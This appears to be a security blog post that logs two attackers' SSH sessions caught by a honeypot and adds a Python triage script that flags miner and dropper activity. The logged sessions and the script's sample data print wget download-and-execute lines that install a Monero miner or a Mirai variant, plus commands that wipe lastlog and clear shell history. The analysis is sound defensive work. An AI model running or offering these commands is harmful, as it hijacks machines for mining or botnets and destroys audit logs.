Scanning for Scanners Update

It seems overnight I have gotten two honeypot bites, both from SMA (suckmyass) variants that I expected to be dead. Let’s see what they did, shall we?

138.36.██.██ connects with SSH-2.0-PuTTY_Release_0.70, user SSH2 and password Hacked12123.

ls
ls -a
uname -a
cat /proc/cpuinfo
wget http://167.88.███.██/m -O - > /etc/.0; chmod 777 /etc/.0; /etc/.0 -u 42bWPQ... -o pool.monero.hashvault.pro:5555 -p x -k -a cryptonight -B --donate-level=1 --max-cpu-usage=98; rm -rf nohup.out /var/log/lastlog; history -c

*I truncated that Monero wallet address, since it serves no purpose but to take up space.

Disconnected.

Seems they did this manually, judging by their use of PuTTY. Didn’t quite make them the money they expected, unfortunately!

Warning: there are some offensive passwords coming up. I’ll censor them, but I’m sure you can work out what they are.

194.59.2██.███ connects with SSH-2.0-PuTTY_Release_0.70, user bigbots and password fatni██er123.

ls
cd
cd /
ls
lscpu
cd /root
ls
?
help

Disconnected.

194.59.2██.███ connects with SSH-2.0-WinSCP_release_5.13.3, user bigbots and password fatni██er123. Requests sftp subsystem, and then proceeds to disconnect.

194.59.2██.███ connects with SSH-2.0-PuTTY_Release_0.70, user bigbots and password fatni██er123.

ls
wget http://68.1██.██.██/x86███; chmod +x x86███; ./x86███ ssh

*The file behind this link is a Mirai variant.

Disconnected.

Another seemingly manual operation, judging by their evident confusion (the ? and help commands) and the use of SSH-2.0-PuTTY_Release_0.70. The dropper is hosted on a DigitalOcean IP, so I don’t expect it to live much longer after a single abuse report.
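Both sessions above follow a shape that is easy to triage automatically once the honeypot logs the client banner, the username and each command line: interactive Windows client, a bit of hardware recon, then either a download-and-run miner command line (with a stratum pool and anti-forensics tail) or a download-and-run dropper. The script below is an added example written for this post, not code from the honeypot or from any project mentioned here. Its sessions are constructed with documentation-range IPs, placeholder wallet and pool values, and a placeholder binary name, so nothing in it is a real indicator; the tag names and the verdict function are my own choices.

```python
"""Triage captured honeypot SSH sessions for miner and dropper activity.

Added example, not the post's own code. All sessions below are constructed:
documentation-range IPs, placeholder wallet/pool/binary names.
"""
import re
from dataclasses import dataclass, field


@dataclass
class Session:
    src: str                 # source IP (constructed, documentation range)
    client: str              # SSH client version banner as logged
    user: str
    commands: list = field(default_factory=list)


# Constructed sample sessions mimicking the shape of the captures discussed.
SESSIONS = [
    Session("192.0.2.10", "SSH-2.0-PuTTY_Release_0.70", "SSH2", [
        "ls", "ls -a", "uname -a", "cat /proc/cpuinfo",
        "wget http://198.51.100.7/m -O - > /etc/.0; chmod 777 /etc/.0; "
        "/etc/.0 -u WALLET_PLACEHOLDER -o pool.example.invalid:5555 -p x "
        "-k -a cryptonight -B --donate-level=1 --max-cpu-usage=98; "
        "rm -rf nohup.out /var/log/lastlog; history -c",
    ]),
    Session("203.0.113.5", "SSH-2.0-PuTTY_Release_0.70", "bigbots", [
        "ls", "cd", "cd /", "ls", "lscpu", "cd /root", "ls", "?", "help",
    ]),
    Session("203.0.113.5", "SSH-2.0-WinSCP_release_5.13.3", "bigbots", []),
    Session("203.0.113.5", "SSH-2.0-PuTTY_Release_0.70", "bigbots", [
        "ls", "wget http://198.51.100.9/x86bin; chmod +x x86bin; ./x86bin ssh",
    ]),
]

URL_RE = re.compile(r"https?://[^\s;'\"]+")           # download source
POOL_RE = re.compile(r"-o\s+([\w.-]+:\d+)")             # xmrig-style pool arg
DOWNLOAD_EXEC_RE = re.compile(r"\b(wget|curl)\b.*\bchmod\b")
RECON = {"uname -a", "cat /proc/cpuinfo", "lscpu"}       # hardware sizing
INTERACTIVE_CLIENTS = ("PuTTY", "WinSCP")                # hand-driven tools


def classify(session):
    """Return detection tags and extracted indicators for one session."""
    tags = set()
    iocs = {"urls": [], "pools": []}
    if any(name in session.client for name in INTERACTIVE_CLIENTS):
        tags.add("interactive_client")
    if not session.commands:
        tags.add("no_commands")           # e.g. sftp probe, then disconnect
    for cmd in session.commands:
        stripped = cmd.strip()
        if stripped in RECON:
            tags.add("recon")
        if stripped in {"?", "help"}:
            tags.add("operator_confusion")
        if DOWNLOAD_EXEC_RE.search(cmd):
            tags.add("download_exec")
        iocs["urls"].extend(URL_RE.findall(cmd))
        pool = POOL_RE.search(cmd)
        if pool and ("cryptonight" in cmd or "donate-level" in cmd):
            tags.add("miner_config")
            iocs["pools"].append(pool.group(1))
        if "history -c" in cmd or re.search(r"rm -rf .*lastlog", cmd):
            tags.add("anti_forensics")
    return {"tags": sorted(tags), "iocs": iocs}


def verdict(result):
    """Collapse tags into a single label, most severe first."""
    tags = set(result["tags"])
    if "miner_config" in tags:
        return "cryptominer"
    if "download_exec" in tags:
        return "dropper"
    if "recon" in tags:
        return "recon"
    return "probe"


def clients_by_source(sessions):
    """Map each source IP to the set of client banners it used (shows the
    same operator returning with different tools)."""
    out = {}
    for s in sessions:
        out.setdefault(s.src, set()).add(s.client)
    return out


if __name__ == "__main__":
    for s in SESSIONS:
        r = classify(s)
        print(s.src, s.client, verdict(r), r["tags"], r["iocs"])
    print(clients_by_source(SESSIONS))
```

The regexes are deliberately narrow: the pool rule requires both a `-o host:port` argument and a miner-specific flag, so a plain `-o` to some other tool does not trip it, and the download-and-execute rule needs a fetch followed by `chmod` on the same line, which is what both captured sessions do.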

That’s all for now.